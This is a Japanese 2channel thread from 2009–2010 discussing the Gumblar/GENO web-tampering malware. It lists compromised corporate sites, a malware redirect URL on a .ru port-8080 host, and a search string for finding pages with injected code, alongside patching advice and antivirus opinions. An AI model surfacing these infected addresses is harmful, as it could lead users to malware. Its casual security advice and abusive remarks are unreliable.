09/12/27 03:24:42
8080よりむしろGENOのがいらないと思うが

319:名無しさん@お腹いっぱい。
09/12/27 03:28:01
テンプレから無駄な論争に発展しそうな要素を排除すればいいだけだろ。
ブラウザのJavaScript関連なんてテンプレに書く必要ないと思うわ。

320:名無しさん@お腹いっぱい。
09/12/27 03:29:01
ウェブ改竄や脆弱性をついた攻撃であることが分かればいいだろ
8080なんてなんでいるんだよ
それならGENOや/*GNU GPL*/や/*CODE1*/とかのがよっぽどいい
こんなことで争うつもりはないが8080はないよ

321:名無しさん@お腹いっぱい。
09/12/27 03:37:36
スレタイでもうこんな状態かよw
総合スレなんてもうどうにでもな~れ(AA略

322:名無しさん@お腹いっぱい。
09/12/27 03:50:52
固有名詞ならGumblar(ガンブラー)(系)表記が正しいけど、
GENOウィルスって名称は普通名詞だから、通称表記ならGENOウィルスだね。

323:名無しさん@お腹いっぱい。
09/12/27 03:52:18
タイトルなんて分かれば良いんだけどさ
さすがにGENOは一番有名な呼び名だからいるだろ

324:名無しさん@お腹いっぱい。
09/12/27 03:54:26
だから GENO(系)ウィルススレ でいいんじゃね?

325:名無しさん@お腹いっぱい。
09/12/27 03:55:13
GENOには悪いが
もはやGENOウイルスはウェブ改竄による脆弱性攻撃の総称になりつつあるな

326:名無しさん@お腹いっぱい。
09/12/27 03:58:39
このウィルスってVistaとWin7には無害なんでしょ?

327:名無しさん@お腹いっぱい。
09/12/27 04:06:29
これ感染するとどうなるの?

328:名無しさん@お腹いっぱい。
09/12/27 04:08:37
テンプレは用意してあるがブラウザのJavaScript関連は入れてない
セキュリティ・アップデートのみまとめてある

あとスレタイについては
【8080系ウイルスについて】
という簡単な説明を入れてあるので反対意見もあるが8080は入れたい

>>206 は残念ながら長すぎて入らないので現スレタイ案は
>>203 となっている

とりあえず正式名称と検索でGumblar/GENOは必要と思う
そうすると残りは/*GNU GPL*/と/*CODE1*/だが長くて入らないし
表記が変わるかもしれないので8080の総称を、と思うんだが・・・

329:名無しさん@お腹いっぱい。
09/12/27 04:14:52
>>328
テンプレ用意してあるんなら、このスレとは別に立てればいいじゃん。
このスレのスレタイは今後も GENOウイルススレ だよ。

330:名無しさん@お腹いっぱい。
09/12/27 04:17:05
>>328
次スレ(笑)
スレリンク(sec板)

331:名無しさん@お腹いっぱい。
09/12/27 04:29:46
立てた
追加テンプレ、サンクス

【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
スレリンク(sec板)

抜け、間違いがあれば指摘よろ

332:名無しさん@お腹いっぱい。
09/12/27 10:32:04
ノートンだと8080系で侵入防止が働く

333:名無しさん@お腹いっぱい。
09/12/27 14:43:02
>>318
まだ世の中ではGENOという呼称が一般的かと

334:名無しさん@お腹いっぱい。
09/12/27 14:43:43
>>319
それはこまる。ヘボ庶民としては。

335:名無しさん@お腹いっぱい。
09/12/27 14:55:54
>>333
×世の中
○2chの中

336:名無しさん@お腹いっぱい。
09/12/27 15:32:18
>>332
たしかにノートンで侵入防止が働きました。
一安心?

337:名無しさん@お腹いっぱい。
09/12/27 18:05:46
ふと思ったけど、
これって、8080の外行きをブロックしちゃえばOKか?

意外に対策しやすいオチ?


338:名無しさん@お腹いっぱい。
09/12/27 18:26:17
みんながブロックしたら80にするだけだと思うんだ
8080はたぶん串

339:名無しさん@お腹いっぱい。
09/12/27 18:48:02
だから8080なんて呼ぶなよ
頭悪いだろ

340:名無しさん@お腹いっぱい。
09/12/27 18:50:53
GENOのが頭悪い

341:名無しさん@お腹いっぱい。
09/12/27 18:52:04
頭悪いは良いぎだが
そう呼ぶ理由がない

342:名無しさん@お腹いっぱい。
09/12/27 18:56:15
実質そう読んでるのは一人だろ
なぜか普及させようとしてるようだが

343:名無しさん@お腹いっぱい。
09/12/27 19:36:06
ポート8080を使う改竄は、海外メインで他にもあるらしいからなあ…
って、これ以上は総合スレ出来た以上スレチか

344:名無しさん@お腹いっぱい。
09/12/27 19:41:51
>>322


345:名無しさん@お腹いっぱい。
09/12/28 00:18:27
GENOに感染してると100%わかるサイトチェッカーってある?

346:名無しさん@お腹いっぱい。
09/12/28 00:25:49
むしろ感染してたら迷惑なので、さっさとネットから切断して欲しいんだが

347:名無しさん@お腹いっぱい。
09/12/28 00:26:21
GIGAZINEが感染してる
注意せよ

348:名無しさん@お腹いっぱい。
09/12/28 00:27:05
注意喚起あげ

349:名無しさん@お腹いっぱい。
09/12/28 00:44:27
今見たけど見当たらないような

350:名無しさん@お腹いっぱい。
09/12/28 00:46:20
Nortonセーフウェブでもgredでも異常なしだった。
どこが感染してるの?

351:名無しさん@お腹いっぱい。
09/12/28 00:46:58
GIGAZINEはAvastの誤検知のやつじゃねえの?
ちゃんと確認したのかよ

352:名無しさん@お腹いっぱい。
09/12/28 00:54:34
>>347
PCニュースにスレ立てるとかGIGAZINEにメールとかはしたの?

353:名無しさん@お腹いっぱい。
09/12/28 00:55:52
GIGAZINEは無罪
またavastが、やらかした
スレリンク(sec板:897番)n-

354:名無しさん@お腹いっぱい。
09/12/28 00:58:28
ソース見たけどって・・またavastか

355:名無しさん@お腹いっぱい。
09/12/28 00:59:26
誤検出かどうかも確認しないで条件反射で騒ぎ立てる奴は消えろよ
アホか

356:名無しさん@お腹いっぱい。
09/12/28 01:01:55
すまん… orz By avast

357:名無しさん@お腹いっぱい。
09/12/28 01:26:44
HTMLわからんのに感染てるって言い切るところがかっこいい

358:名無しさん@お腹いっぱい。
09/12/28 01:27:29
しがぬけたけどどうてもよかった

359:名無しさん@お腹いっぱい。
09/12/28 01:34:21
こんな短期間にまたも語検出暴発再発とは…。
さすがにこれでもうavast使うやつはいなくなるだろ。
これでまだ使うのはマゾか頭がイカれてるかどちらかだ。

360:名無しさん@お腹いっぱい。
09/12/28 02:51:41
スルーされて感染するよりか誤検出のほうがマシという考えもあるからね
avast使い慣れてるし便利な機能もあるからサポートが切れるまでは乗り換えは眼中にないかな

361:名無しさん@お腹いっぱい。
09/12/28 03:01:08
ユニメル騒動に釣られたデジタルマガジン 今度はGENOウイルスに感染か?
スレリンク(news板)

362:名無しさん@お腹いっぱい。
09/12/28 04:47:55
■カスペルスキー
初期設定が明らかにまずいから変更推奨。
GENOに特化しているがそれ以外は微妙。
癖があってアプリやwinupdate時に誤作動起こしたり勝手に削除される事あり。

■マカフィー
御三家では地味な印象。
シンプルでそこそこ軽い部類だけど対応が甘く信頼しきれない。

■ウィルスバスター
ガチ重い。
無駄にリソース喰いで受けていないテストも多く検出能力は眉唾、過去に盛大なやらかし有。

■ノートン
初期設定がまずいから要設定。常駐時は軽いがスキャンは遅い。
定義更新でたまにやらかしたりFIREFOX3.5xとの相性が微妙。
2010実装のSONAR2はGENO亜種などの未知のウィルスに対応しているが設定変えないと
強力な誤爆(=デフォルトだと強制削除)をくらう可能性ありで注意。
多機能でアドオンとインサイトなどの連携機能は優秀。
OSは安定性考えるならVista以降を推奨。

■ESET
軽くて割とシンプル(機能面でちょっと物足りないかも)。
検出能力は普通か。過去に一度だけ盛大なやらかし有。


誰でも知ってる市販の有名どころを出してみたが、ぶっちゃけ、どこも一長一短ですな。


363:名無しさん@お腹いっぱい。
09/12/28 05:00:28
いきなりどうした?

364:名無しさん@お腹いっぱい。
09/12/28 05:34:34
男ならアンチウィルスもFWも必要ない!
常時ノーガードだ

365:名無しさん@お腹いっぱい。
09/12/28 09:29:54
esetなんて有名でもなんでもないが…またアレな人かw

366:名無しさん@お腹いっぱい。
09/12/28 13:47:24
この手のウイルス感染って
やっぱりみんな管理者権限で普段から使ってるってこと?


367:名無しさん@お腹いっぱい。
09/12/28 15:25:17
だってじゃないと不便だし・・・

っていう層が大半だからだろ

368:名無しさん@お腹いっぱい。
09/12/28 16:10:17
DropMyRightsってソフトいいね
マイクロソフト製だし(未サポートソフトだけど)
普段管理者権限で使ってるけどWEBアプリとかこれ通して起動したら
そのアプリはユーザー権限に下げられる
GENO対策にいいんじゃない?


369:名無しさん@お腹いっぱい。
09/12/28 16:16:08
そんなの使うやつなら
もともとGENOなど感染しない

370:名無しさん@お腹いっぱい。
09/12/28 16:17:39
Vistaユーザになる

371:名無しさん@お腹いっぱい。
09/12/28 16:35:57
GENOじゃないけど
最近のパスワード流出はソフトの設定読み取るのもあるみたいだから
権限関係なかったりする

372:名無しさん@お腹いっぱい。
09/12/28 16:39:41
そもそもユーザー権限とか基本的には関係ないし。
単にアップデートを怠っている馬鹿が引っかかるだけだろ。

373:名無しさん@お腹いっぱい。
09/12/28 16:53:32
ユーザー権限関係ないっておかしくね?
感染PCシステムファイル変更されてるみたいだけど
ユーザー権限でシステムに変更加えられるの?

374:名無しさん@お腹いっぱい。
09/12/28 17:05:43
>>362
GDATAが入ってないとな!?

375:名無しさん@お腹いっぱい。
09/12/28 17:14:17
>>373
だから「基本的には」だろ。
やるべきことさえきっちりやっておけばシステムファイルの変更なんてされないんだから。

376:名無しさん@お腹いっぱい。
09/12/28 17:24:26
これ感染したらどうなるの?

377:名無しさん@お腹いっぱい。
09/12/28 17:44:32
信越放送HP 不正アクセスされ改ざん 閲覧した人はウイルスに感染した可能性
スレリンク(news板)

378:名無しさん@お腹いっぱい。
09/12/28 21:20:47
>>287
実害はこれの10倍以上はあるだろうな

379:名無しさん@お腹いっぱい。
09/12/31 14:18:06
 

380:名無しさん@お腹いっぱい。
10/01/01 02:32:55
ん?

381:某社シス管
10/01/01 15:49:14
さて、年明け早々、Web改竄ウイルス対策を上に説明しないといけない。
うちは、被害が確認されていないけど。
これから、資料作るべか。
親会社のシステムの関係でAdobeのJavaScript切れないし、
ReaderもflashもJREも自動更新きってあるし、配布ツールないし、700台あるし、どないするべかな。
親会社からのウイルス対策案内は、「なめてんのか?」のかという内容だし(無許可のUSBメモリなど使うなとか勝手にソフト入れるなとか)だし。
はぁ~・・orz


382:名無しさん@お腹いっぱい。
10/01/02 05:59:01
700台のハニーポットか…

383:名無しさん@お腹いっぱい。
10/01/04 03:35:07
URLリンク(www)●naito-akira●com/
新型っぽい。

384:名無しさん@お腹いっぱい。
10/01/04 07:21:21
>>383
GNU GPLの8080。新型というほどでは…。飛び先は
salesforce-com.tinypic.com.gameztar-com.guidebat■ru:8080/rambler.ru/rambler.ru/corriere.it/adsrevenue.net/google.com/

385:名無しさん@お腹いっぱい。
10/01/04 23:03:29
//www●morozoff●co.jp/

ニュー速で何やら話題になっていたようだがこれは?

386:名無しさん@お腹いっぱい。
10/01/04 23:04:52
GNU GPLの8080。

387:名無しさん@お腹いっぱい。
10/01/04 23:13:22
モロゾフの公式サイトでトロイ配布中
スレリンク(news板)l50


388:名無しさん@お腹いっぱい。
10/01/04 23:26:39
モロゾフ、アウト~

389:名無しさん@お腹いっぱい。
10/01/05 00:29:25
504 名前: アスピレーター(アラバマ州)[sage] 投稿日:2010/01/05(火) 00:05:24.72 ID:9xzGeSng
感染してるやつ

プロセス見てみろ変なのが('A`)


516 名前: カッターナイフ(鹿児島県)[sage] 投稿日:2010/01/05(火) 00:08:10.60 ID:JBW7jlI0
>>504
~TM108.tmp
こんな感じのやつ?

524 名前: アスピレーター(アラバマ州)[sage] 投稿日:2010/01/05(火) 00:10:12.00 ID:E7kbsyQA
>>516
そう

>>517
ログインしているユーザー名
systemにはいない

535 名前: アスピレーター(アラバマ州)[sage] 投稿日:2010/01/05(火) 00:12:24.54 ID:E7kbsyQA
うわあああああああああああああああああああああ
早速TELNETでユーザ名的確に打って総当たり攻撃キタ━━(°Д°)━━!!!!

ファイル抜かれるからIP変更するさらばあああああ

390:名無しさん@お腹いっぱい。
10/01/05 00:48:03
楽しそうだなw

391:名無しさん@お腹いっぱい。
10/01/05 17:07:20
Gumblarが読売の夕刊のトップ記事になってるね
カタカナでガンブラーって凄い違和感があるけどw

392:名無しさん@お腹いっぱい。
10/01/05 17:16:10
釣りだろ

393:名無しさん@お腹いっぱい。
10/01/05 17:21:14
GENO(Gumblar)ウイルススレ ★24

394:名無しさん@お腹いっぱい。
10/01/05 18:24:43
ガンプラー

395:名無しさん@お腹いっぱい。
10/01/05 20:33:59
グーグルの急上昇ワードにガンブラーがw

396:名無しさん@お腹いっぱい。
10/01/05 20:44:44
癌ブラーは転移していくぞ


397:名無しさん@お腹いっぱい。
10/01/05 22:25:29
p://knnn4321●chips●jp/hpblog/p-18044●html

かなりヤバい

398:名無しさん@お腹いっぱい。
10/01/05 22:32:33
avastたん入れるしかないのか

399:名無しさん@お腹いっぱい。
10/01/05 22:41:11
>>397
新種か?

400:名無しさん@お腹いっぱい。
10/01/05 23:27:03
>>397
なにもないぞ

401:名無しさん@お腹いっぱい。
10/01/05 23:31:24
うん?

402:名無しさん@お腹いっぱい。
10/01/05 23:41:53
prototype.jsに仕込み

403:名無しさん@お腹いっぱい。
10/01/05 23:48:47
辻ちゃんのサイトがトロイに感染
スレリンク(news板)

404:名無しさん@お腹いっぱい。
10/01/06 01:01:51
辻ちゃん、アウト~

405:名無しさん@お腹いっぱい。
10/01/06 01:32:24
今北さん用、GENO(Gumblar)ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)~(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す

406:名無しさん@お腹いっぱい。
10/01/06 01:55:54
p://www●biwako●ne●jp/~kohsoku/home●html

407:名無しさん@お腹いっぱい。
10/01/06 04:10:27
ReaderとFlashはともかく、JREとQuick Timeは余程の事がない限り
入れない方が賢い

408:名無しさん@お腹いっぱい。
10/01/06 04:29:09
株や為替のチャートってJava使ってる業者が多いから使わざる得ない人も多いはず


409:名無しさん@お腹いっぱい。
10/01/06 04:54:08
入れててもチェック外して使わないようにしてればいいがね

410:名無しさん@お腹いっぱい。
10/01/06 05:09:09
JREはシステムに喰いこみ過ぎでうざい

411:名無しさん@お腹いっぱい。
10/01/06 06:52:22
>>408
お絵描き掲示板がほぼJavaなので同人では多いかもね

412:名無しさん@お腹いっぱい。
10/01/06 10:21:18
zing-vn.google~
のアドレスの中身(IP)がフランスに飛んだりドイツに飛んだりしてる?

413:名無しさん@お腹いっぱい。
10/01/06 10:52:09
今日の朝日新聞朝刊1面にガンブラーが載ってた。対策はウイルス対策ソフトを最新にすることだってさ。
abobe readerのことまで書けばいいのにね

414:名無しさん@お腹いっぱい。
10/01/06 10:53:32
>>413 URLリンク(www.asahi.com)


415:名無しさん@お腹いっぱい。
10/01/06 11:06:36
>>404
嘘の情報を流して楽しいの?

416:名無しさん@お腹いっぱい。
10/01/06 12:02:23
>>30
コピー~貼り付けでこれ使ってしまった俺は負け組か?

417:名無しさん@お腹いっぱい。
10/01/06 12:04:43
>>407
QuickTimeはどうしても必要な場合のみ一旦落としてから他のフォーマットに変換して見てるから特に困らない
JREはサブ機のみに入れて利用してる

418:名無しさん@お腹いっぱい。
10/01/06 12:10:10
>>416
まあドンマイ

419:名無しさん@お腹いっぱい。
10/01/06 12:22:34
UACてなに~?
教えてエロい人

420:名無しさん@お腹いっぱい。
10/01/06 12:28:42
>>414

>被害は計5社、改ざんされたサイトの閲覧者は延べ7万人を超す。
>(中略)
>ホンダはミニバン「ストリーム」のサイトが昨年12月18~21日に改ざんされ、約5千人が閲覧した。
>JR東日本のHPは同月8~22日に不正アクセスが繰り返され、プログラムが書き換えられた。
>23日に約17時間にわたって閉鎖して復旧したが、それまでの閲覧者は約5万人。
>
>信越放送のHPも同月26~28日に改ざんされ、約5400人が閲覧した。
>ラジオ関西では同月15~16日に特集サイトの「アニたまどっとコム」が改ざん、約6千人が閲覧した。
>洋菓子のモロゾフのHPは今月4~5日に改ざん。「ガンブラーかどうかは調査中」とするが、この間に約3860人が閲覧した。

421:名無しさん@お腹いっぱい。
10/01/06 12:33:44
>>412
fast-fluxなんでね? 手駒に使える陥落サイトが腐るほどあるし。
そことは別の8080にdigしまくってみたけど1秒経たずにIP変わる。

422:名無しさん@お腹いっぱい。
10/01/06 12:36:16
ユーザーアカウント制御のことだお。
それぐらいググレ厨房

423:名無しさん@お腹いっぱい。
10/01/06 12:44:15
>>416
悔しかったら通報してみなさい!

424:名無しさん@お腹いっぱい。
10/01/06 14:04:47
>>419
URLリンク(www.tkssoft.com)

425:名無しさん@お腹いっぱい。
10/01/06 14:07:27
モロゾフをgoogleで検索したら、AVGツールバーは安全ですって緑のマークが検索結果横に付いているんだけど、もうこのサイトの脅威は去ったの?
それともまだ訪問したらgumblarに感染するのかな?

426:名無しさん@お腹いっぱい。
10/01/06 14:18:57
>>425
モロゾフは修正されてるね

427:名無しさん@お腹いっぱい。
10/01/06 14:21:56
>>381
つ Systems Management Server



428:名無しさん@お腹いっぱい。
10/01/06 14:33:28
>>423
「30に引っかかって、パソコンのエロ動画が全部消えてしまいまいた」
って通報しますた。

429:名無しさん@お腹いっぱい。
10/01/06 14:40:05
wwwwwwww

430:名無しさん@お腹いっぱい。
10/01/06 14:44:52
>>425
検索エンジンで未だに改ざんコードが埋まってるページを検索しても安全扱いされてそうな気がするんだけど、
そこら辺はどうなってる?

431:名無しさん@お腹いっぱい。
10/01/06 15:17:16
>>430
そこが自分も知りたいのですよ
今脅威のあるサイト名が分からないので試せないのですが、このツールバーがいったいどの程度の精度と安心・信頼感があるのかを試したくて
もし今脅威のサイトを検索して黄色とかになっていたら信用できるから自分は引っかかる可能性は低いと安心できるのですが・・・

432:名無しさん@お腹いっぱい。
10/01/06 15:32:55
そもそもAVGはモロゾフのやつ防げるのか?
スクリプトも何もかも検出してるところは見たこと無いが

433:名無しさん@お腹いっぱい。
10/01/06 15:43:48
>>431
Bingで「"*/ try{window.onload"」で検索してみて
※リンク先には改ざんコードが埋まってるのでアクセスは絶対にしないように

多分改ざんには対応してない気がするんだけどな

434:名無しさん@お腹いっぱい。
10/01/06 15:46:30
動的サイトを作らなければOK

435:名無しさん@お腹いっぱい。
10/01/06 16:00:37
>>430
www.hikky-country.net
ここのサイトは埋め込まれたまま1ヶ月くらい放置してたけど、google検索で安全の緑マークのままだった。
検索エンジンは、リアルタイムで、内容を反映するわけではないし、安全マークを「今現在」の判断の根拠にするのは無理があるのでは?

436:名無しさん@お腹いっぱい。
10/01/06 16:24:15
>>435
AVGツールバーの仕組みを理解してるか?

437:名無しさん@お腹いっぱい。
10/01/06 16:39:58
だからすくりぷと防げるとかにやっきになってないで
ソフト更新しとけばオワリ
してる?じゃあきにすんなオワリ

438:名無しさん@お腹いっぱい。
10/01/06 17:17:12
フジテレビキタ━━━(゚∀゚)━━━!!!!

439:名無しさん@お腹いっぱい。
10/01/06 17:40:25
GENOウイルス感染 ローソン
スレリンク(news板)

440:名無しさん@お腹いっぱい。
10/01/06 17:43:46
>>435
今はどうなん?
対処したの?
俺のgoogle検索結果でもAVGは緑マークだけど

ってか、寧ろ逆にこのAVGが黄色とか注意してる検索結果サイトを知りたい


441:名無しさん@お腹いっぱい。
10/01/06 17:47:32
>>439
マジか?
ローソンもう対処うったのか分からんけれど例のAVGは緑チェック入ってるね

ってか、このウィルスっていったいどうやって各サイトに侵入してスクリプト埋め込んでるの?
俺Webサイト作るんだけど、対策どうすればいいのか分からないんだけど・・・
サーバサイド側のどこをどうしたらいいのかとか

442:名無しさん@お腹いっぱい。
10/01/06 17:49:08
馬鹿すぎプレイか1から読めよ

443:名無しさん@お腹いっぱい。
10/01/06 17:49:31
HTMLとCSSだけ使っとけばいいよ^^

444:名無しさん@お腹いっぱい。
10/01/06 18:07:21
>>30
最低だな、お前!
氏ねよ!

>>416
のようにやってしまった人間はアクセサリの復元しても駄目なん?


445:名無しさん@お腹いっぱい。
10/01/06 18:24:21
さっきTVでも、ローソンに「狙われる覚えは?」なんてアホな質問してたし
世間的にはこのウイルスもそういう認識が大方なんだろうなあ

446:名無しさん@お腹いっぱい。
10/01/06 18:55:35
p://hirayuonsen●or●jp/

ここも反応する。。

447:名無しさん@お腹いっぱい。
10/01/06 19:07:16
>446
森のほうはどう?

448:名無しさん@お腹いっぱい。
10/01/06 19:10:11
アンチウイルスソフトはどれがいいんだよ。
どのスレも荒れてて訳わからんわ。

449:名無しさん@お腹いっぱい。
10/01/06 19:13:05
カスペかアバスト

450:名無しさん@お腹いっぱい。
10/01/06 19:13:17
>>448
「Norton 360 Ver.3 2コニコPACK」がいいよ。

451:名無しさん@お腹いっぱい。
10/01/06 19:16:58
バスターしかないだろ

452:名無しさん@お腹いっぱい。
10/01/06 19:20:45
>>448
有料ならKaspersky
URLリンク(www.kaspersky.co.jp)

無料ならavast!
URLリンク(files.avast.com)
URLリンク(www.btfree.info)

453:名無しさん@お腹いっぱい。
10/01/06 19:42:07
>>444
ムリだよ
こういう屑虫は逮捕された方が世の為だが、
税金で生かすにも勿体ないので死んで欲しいよね

454:名無しさん@お腹いっぱい。
10/01/06 19:42:52
>>439はギコナビで見ても大丈夫?
見ようとしたらウイルスソフトが「だめーーー!」って言って見れなかったんだが…

455:名無しさん@お腹いっぱい。
10/01/06 19:44:02
Norton360は余計な糞機能が付きまくってるから論外
通常のNIS2010はOK
バスターは無駄に重いがPCのスペックに余裕がある人は可

456:名無しさん@お腹いっぱい。
10/01/06 19:44:28
GENO専なら重いカスペか
うちは3939NODだけどw
バスターはありえない

457:名無しさん@お腹いっぱい。
10/01/06 19:45:24
カスペは誤爆ひどいぞ
GENO以外じゃ使えたもんじゃない

458:名無しさん@お腹いっぱい。
10/01/06 19:47:36
アンチソフトなんか最後の最後の気休め
それなりに知識あればウイルスなんかかからんし
アホが変なサイト回ってればどれでも同じ

459:名無しさん@お腹いっぱい。
10/01/06 19:54:38
>>458みたいな知的障害者を駆除するソフトが欲しいな


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch